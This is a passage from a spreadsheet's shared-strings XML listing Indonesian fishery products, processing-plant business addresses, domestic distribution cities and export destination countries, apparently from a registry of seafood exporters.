    <t>Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kabupaten Gresik, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Semarang, Kabupaten Sidoarjo, Kota Pasuruan, Kota Mojokerto, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami, Kawasan Pergudangan Karunia Sulawesi Blok C No.11, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>China, India, Korea, Democratic People's Republic of, Philippines, Taiwan, Province of China, Tunisia, Viet Nam</t>
  </si>
  <si>
    <t>Griya Taman Asri GE No.01, Kel. Tawangsari, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Hong Kong, Japan, Malaysia, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering</t>
  </si>
  <si>
    <t>Tulang Cumi-Cumi Kering</t>
  </si>
  <si>
    <t>Kota Surabaya, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Cephalopoda Kering (Gurita, Cumi-cumi)</t>
  </si>
  <si>
    <t>Ikan Asin Kaleng</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Bandar Lampung, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Seafood Kaleng</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan, Kota Bengkulu, Kota Jakarta Pusat, Kabupaten Lamongan</t>
  </si>
  <si>
    <t>Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>France, Greece, Italy, Netherlands, Portugal, United Arab Emirates</t>
  </si>
  <si>
    <t>Japan, United Arab Emirates</t>
  </si>
  <si>
    <t>Australia, Japan, Netherlands, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemadang, Marlin, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Guadeloupe, Italy</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kaneke, Kakatua, Laccukang, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kaneke, Kakatua, Laccukang, Kakap, Kurisi, Barramundi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Lemadang, Marlin, Tenggiri, Todak)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok E No.1, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Kembung, Marlin, Semar, Gindara, Cakalang, Pedang)</t>
  </si>
  <si>
    <t>Japan, Mauritius, United States</t>
  </si>
  <si>
    <t>Japan, Malaysia, Mauritius, Singapore, United States</t>
  </si>
  <si>
    <t>Japan, Malaysia, Singapore, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Emperor, Kuwe, Kerapu, Layur, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Japan, Malaysia, Singapore, United States</t>
  </si>
  <si>
    <t>Sambal Roa</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Manado</t>
  </si>
  <si>
    <t>Lingkungan Teleng RT 01 RW 11, Kel. Sidoharjo, Kec. Pacitan, Kabupaten Pacitan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Semarang, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya</t>
  </si>
  <si>
    <t>Desa Kauditan I Jaga IV, Kec. Kauditan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bandung, Kabupaten Rembang, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Tegal</t>
  </si>
  <si>
    <t>Jl. Sampangan B1/A, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>China, Malaysia, Singapore, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. DI Panjaitan No. 01 RT 001 RW 001, Kel. Saradan, Kec. Pemalang, Kabupaten Pemalang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Jl. Prof. Dr. Ir. Sutami No.32, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Netherlands, Russian Federation, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tembang, Marlin, Layaran, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Putih, Swanggi, Kerapu, Kaneke, Kakatua, Bawal, Layur)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Saudi Arabia, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kuwe, Lemadang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Dermaga PHPT Blok B No 3 - 4, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Bekasi, Kota Depok</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Barramundi, Kerapu, Lencam, Kerapu, Layur, Kakap, Baronang)</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Depok</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Deho, Kembung, Lemadang, Salem, Muroaji, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, France, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Teri Nasi Kammage</t>
  </si>
  <si>
    <t xml:space="preserve">Serundeng Ikan </t>
  </si>
  <si>
    <t>Kota Jakarta Timur, Kota Surakarta, Kota Yogyakarta, Kabupaten Pacitan, Kota Surabaya</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Surabaya, Kota Pontianak, Kota Samarinda, Kabupaten Nabire</t>
  </si>
  <si>
    <t>Gabon, Ghana, India, Japan, South Africa</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Pergudangan Kosambi Permai Extention Blok O No.12A, Kel. Belimbing, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Rendang Belut</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kota Bandung, Kabupaten Cilacap</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung</t>
  </si>
  <si>
    <t>Rumput Laut Berbumbu</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bandung, Kota Bandung</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Alaska Pollock, Capelin, Kembung, Makerel, Salem, Selar Kuning)</t>
  </si>
  <si>
    <t>Gurita Berbumbu</t>
  </si>
  <si>
    <t>Pergudangan Kosambi Permai Blok D No.1, Jl. Raya Perancis, Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Tuna Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap, Sebelah, Kerapu, Kurisi, Kakap, Ikan Sebelah)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Macao, Singapore, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah Raya, Kel. Buloa, Kec. Tallo, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Al Ikhsan, Kp Kemang No.104, Kel. Jatibening Baru, Kec. Pondok Gede, Kota Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Kaki Naga, Pangsit Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bogor, Kota Bandung, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Raya Margomulyo No.44, Suri Mulia Permai Blok NN No.01, Kel. Greges, Kec. Asemrowo, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tongkol, Salem, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kabupaten Semarang, Kota Semarang, Kabupaten Trenggalek, Kabupaten Banyuwangi, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Ketut Sanggra No.66, Kel. Patas, Kec. Gerokgak, Kabupaten Buleleng&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Butiran Rumput Laut Kering</t>
  </si>
  <si>
    <t>Ekstrak Rumput Laut</t>
  </si>
  <si>
    <t>Dusun Belakang Wamar, Kel. Durjela, Kec. Pulau-Pulau Aru, Kabupaten Kepulauan Aru&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Makerel, Lemadang, Marlin, Gindara, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kerapu, Kakatua, Kakap, Kaci-kaci, Barramundi)</t>
  </si>
  <si>
    <t>Australia, China, Japan, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, China, Japan, Korea, Democratic People's Republic of, Netherlands, Russian Federation, Taiwan, Province of China, Thailand, United Arab Emirates, United States, Viet Nam</t>
  </si>
  <si>
    <t>Seafood Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Naget Udang, Kaki Naga, Keong Mas, Siomay Ikan, Ekkado, Otak-otak Ikan, Roll Ikan)</t>
  </si>
  <si>
    <t>Jl. PPI RT 06 RW 02, Kel. Mansapa, Kec. Nunukan Selatan, Kabupaten Nunukan&lt;br&gt;Kalimantan Utara</t>
  </si>
  <si>
    <t>Japan, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Jl. AKBP. H. Umar No.598 RT 022 RW 001, Kel. Ario Kemuning, Kec. Kemuning, Kota Palembang&lt;br&gt;Sumatera Selatan</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Pempek Ikan, Siomay Ikan, Tekwan Ikan, Dimsun Ikan)</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Deho, Kembung, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Jl. Mulawarman No.99, Kel. Manggar, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Hong Kong, Japan, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Cemara No.59, Kel. Bugul Lor, Kec. Panggungrejo, Kota Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Gg. Murni Barek Motor RT 001 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Jahan, Jebung, Sebelah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Alu-alu, Talang-talang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Raya Salembaran Komplek Pergudangan Royal Kosambi Blok D6 (Room 2), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Raya Salembaran, Pergudangan Royal Kosambi Blok D6 (Room 1), Kel. Cengklong, Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Tongkol, Kembung, Kawabida, Salem)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Patimura Telaga Punggur No.55 RT 001 RW 001, Kel. Kabil, Kec. Nongsa , Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Selar, Cakalang, Benggol)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-pisang, Anggoli, Kerapu, Bawal, Ekor Kuning)</t>
  </si>
  <si>
    <t>Kompleks Parangloe Indah Blok E3 No.10, Kel. Parangloe, Kec. Tamanlarea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile</t>
  </si>
  <si>
    <t>Japan, Spain, United Arab Emirates, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Spain, Viet Nam</t>
  </si>
  <si>
    <t>Sari Ikan Gabus Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Surabaya, Kota Denpasar, Kabupaten Sumbawa, Kabupaten Dompu, Kabupaten Bima, Kabupaten Sumbawa Barat, Kota Mataram, Kota Bima, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Raya Wonosari, Kel. Wonosari, Kec. Gading Rejo, Kabupaten Pringsewu&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Dimsum Ikan, Dimsum Udang, Siomay Ikan) </t>
  </si>
  <si>
    <t>Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Selatan</t>
  </si>
  <si>
    <t>Kabupaten Pesawaran, Kabupaten Pringsewu, Kota Bandar Lampung</t>
  </si>
  <si>
    <t>Kabupaten Pesawaran, Kabupaten Pringsewu, Kota Bandar Lampung, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Dusun Kedungaron RT 05 RW 02, Kel. Gajahbendo, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Siomay Ikan, Kaki Naga Ikan, Tempura Udang, Tempura Ikan)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kabupaten Cirebon, Kabupaten Bekasi, Kabupaten Cilacap, Kabupaten Semarang, Kota Yogyakarta, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Jl. Pulau Sumatera KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Daging Rajungan Rebus Beku</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bekasi, Kota Surabaya</t>
  </si>
  <si>
    <t>Jl. Poros Maros Graha Cemerlang Blok C No.10/11, Kel. Hasanudin, Kec. Mandai, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Barramundi, Sebelah, Kerapu, Jenaha, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Gabion Belawan Komplek PPS, Kel. Bagan Deli, Kec. Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Biji Nangka, Layur, Beloso, Seloncong, Perak-perak, Baronang)</t>
  </si>
  <si>
    <t>Kota Banda Aceh, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kuring, Semar, Salem, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Cemara No.184A, Kel. Pulo Brayan Darat II, Kec. Medan Timur, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuring, Sarden, Aso-aso, Salem, Layang Biru)</t>
  </si>
  <si>
    <t>Kabupaten Aceh Tenggara, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Pekanbaru, Kabupaten Muaro Jambi, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kerapu, Layur, Bawal)</t>
  </si>
  <si>
    <t>Jl. Poros Limunjan, Gg. Sulawesi RT 019, Kel. Sambaliung, Kec. Sambaliung, Kabupaten Berau&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Senangin, Kerapu, Remang, Layur, Bawal, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Kp. Baru Keke RT 003 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Kerapu, Talang-talang, Kakap, Kaci-kaci, Parang-parang)</t>
  </si>
  <si>
    <t>Daging Bekicot Rebus Beku</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Swanggi, Bawal Hitam, Gulama, Kerapu Bintik)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Malaysia, Singapore</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Lemuru, Tongkol, Tembang, Kembung, Marlin)</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Komplek Pergudangan Mutiara Kosambi 1 Blok A-5 No.11, Kel. Kosambi Timur , Kec. Kosambi, Kabupaten Tangerang&lt;br&gt;Banten</t>
  </si>
  <si>
    <t>Jl. Branta Mulia, Kel. Karang Asem Timur, Kec. Citeureup, Kabupaten Bogor&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>India, Philippines, Russian Federation</t>
  </si>
  <si>
    <t>Jl. Inpres Pasar II, Kel. Tanjung Gusta, Kec. Sunggal, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>France, Japan, Malaysia, Taiwan, Province of China, Thailand</t>
  </si>
  <si>
    <t>Jl. Abdul Hamid RT 01, Kel. Kasai, Kec. Pulau Derawan, Kabupaten Berau&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kabupaten Berau, Kabupaten Nunukan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Sebelah, Kerapu, Remang, Kakatua, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal, Layur, Lencam, Kerapu, Kakatua, Kakap, Barramundi)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Patin)</t>
  </si>
  <si>
    <t>Dusun Dermo, Desa Gunung Gangsir No.88, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Barramundi, Bawal, Gulama, Lencam, Kuniran, Anggoli, Kerapu, Layur, Beloso, Kakatua, Kakap, Kaci-kaci)</t>
  </si>
  <si>
    <t>Australia, China, Egypt, France, Guadeloupe, Malaysia, Martinique, Netherlands, United Kingdom</t>
  </si>
  <si>
    <t>France, Greece, Guadeloupe, Martinique, R√©union, United Kingdom</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Tongkol, Maubara, Julung-julung, Makerel, Lemadang, Marlin, Layaran, Kaca Piring, Kapas-kapas, Tenggiri)</t>
  </si>
  <si>
    <t>Australia, France, Guadeloupe, Malaysia, Martinique, R√©union, United Kingdom</t>
  </si>
  <si>
    <t>France, Guadeloupe, Martinique, R√©union, United Kingdom</t>
  </si>
  <si>
    <t>Belgium, France, Guadeloupe, Kuwait, Netherlands, United Kingdom</t>
  </si>
  <si>
    <t>Dusun Dermo, Desa Gunung Gangsir No.88, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jaga XII, Kel. Watutumou, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Salatiga, Kota Manado, Kota Palu</t>
  </si>
  <si>
    <t>Jl. Hutan Lindung RT 16, Kel. Rengas Condong, Kec. Muara Bulian, Kabupaten Batang Hari&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Stik Udang</t>
  </si>
  <si>
    <t>Jl. Alah Air, Kel. Selat Panjang Selatan, Kec. Tebing Tinggi, Kabupaten Kepulauan Meranti&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Jl. Rd. Perang No.71 RT 009, Kel. Pematang Sulur, Kec. Telanaipura, Kota Jambi&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Kembang Goyang Udang</t>
  </si>
  <si>
    <t>Stik Jagung Ikan</t>
  </si>
  <si>
    <t>Krispy Kulit dan Sirip Ikan Gabus</t>
  </si>
  <si>
    <t>Kerupuk Tulang Ikan</t>
  </si>
  <si>
    <t>Dendeng Ikan</t>
  </si>
  <si>
    <t>Jl. Sapta Marga Blok B No. 100 RT 013 RW 003, Kel. Guntung Payung, Kec. Landasan Ulin, Kota Banjar Baru&lt;br&gt;Kalimantan Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Baby Tuna, Tongkol, Kembung, Marlin, Layang)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Bawal, Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, United Arab Emirates</t>
  </si>
  <si>
    <t>Jl. Mundu Pesisir No. 33 KM 4.3, Kel. Mundu Pesisir, Kec. Mundu, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Indonesia, Japan</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bandung Barat, Kota Bandung, Kota Bekasi, Kota Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Kertanegara No.18, Kel. Jember Kidul, Kec. Kaliwates, Kabupaten Jember&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Kabupaten Jember</t>
  </si>
  <si>
    <t>Hong Kong, Turkey</t>
  </si>
  <si>
    <t>Jl. Air Mawar RT 03 RW 02, Kel. Air Mawar, Kec. Bukit Intan, Kota Pangkal Pinang&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Pangkal Pinang, Kota Batam, Kota Jakarta Pusat, Kota Bandung</t>
  </si>
  <si>
    <t>Kota Palembang, Kota Pangkal Pinang, Kota Jakarta Pusat, Kota Bandung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Jahan, Jebung, Kaci-kaci)</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Losari KM 28, Kel. Malakasari, Kec. Gebang, Kabupaten Cirebon&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Sotong)</t>
  </si>
  <si>
    <t>Jl. Gatot Kaca No.86, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kota Bandar Lampung, Kabupaten Cirebon, Kabupaten Sumedang, Kabupaten Malang, Kota Surabaya, Kota Pontianak, Kota Banjarmasin, Kota Manado, Kota Palu, Kabupaten Toraja Utara, Kota Makassar, Kabupaten Sorong</t>
  </si>
  <si>
    <t>Jl. Jala IV No. 32/34, Kel. Rengas Pulau, Kec. Medan Marelan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Lemuru, Tongkol, Kuwe, Tembang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Swanggi, Gulama, Lencam, Sebelah)</t>
  </si>
  <si>
    <t>Yos Sudarso No. 275, Kel. Garuntang, Kec. Bumi Waras, Kota Bandar Lampung&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Lencam)</t>
  </si>
  <si>
    <t>Kabupaten Langkat, Kabupaten Batu Bara, Kota Sibolga, Kota Pematang Siantar, Kota Tebing Tinggi, Kota Medan, Kota Binjai</t>
  </si>
  <si>
    <t>Jl. Magepanda KM 10 RT 012 RW 004, Kel. Hewuli, Kec. Alok Barat, Kabupaten Sikka&lt;br&gt;Nusa Tenggara Timur</t>
  </si>
  <si>
    <t>Kabupaten Pasuruan, Kabupaten Sidoarjo, Kota Denpasar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Baby Tuna, Lemuru, Tongkol, Deho, Layang, Cakalang, Tenggiri, Pedang)</t>
  </si>
  <si>
    <t>Jl. A. Mappainga Barombong, Kel. Barombong, Kec. Tamalate, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.1, Kel. Parangloe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Chile, China, Korea, Democratic People's Republic of, Spain</t>
  </si>
  <si>
    <t>China, Japan, Korea, Republic of, Malaysia, Saudi Arabia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Pisang-pisang, Kuniran, Kerapu, Sukang, Kakatua, Bawal, Kakap Merah)</t>
  </si>
  <si>
    <t>Australia, Brunei Darussalam, China, Japan, Korea, Democratic People's Republic of, Malaysia, Saudi Arabia, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Pisang-Pisang, Kuniran, Kerapu, Sukang, Kakatua, Bawal)</t>
  </si>
  <si>
    <t>China, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Australia, Japan, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Candi Muaro Jambi RT 03, Kel. Tunas Baru, Kec. Sekernan, Kabupaten Muaro Jambi&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Krispy Kulit Lele</t>
  </si>
  <si>
    <t>Kerupuk Lele</t>
  </si>
  <si>
    <t>Kerupuk Tulang Lele</t>
  </si>
  <si>
    <t>Perut Ikan Segar</t>
  </si>
  <si>
    <t>Udang Tempura Beku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Tongkol, Terbang, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Malaysia, Singapore, Taiwan, Province of China, United Arab Emirates</t>
  </si>
  <si>
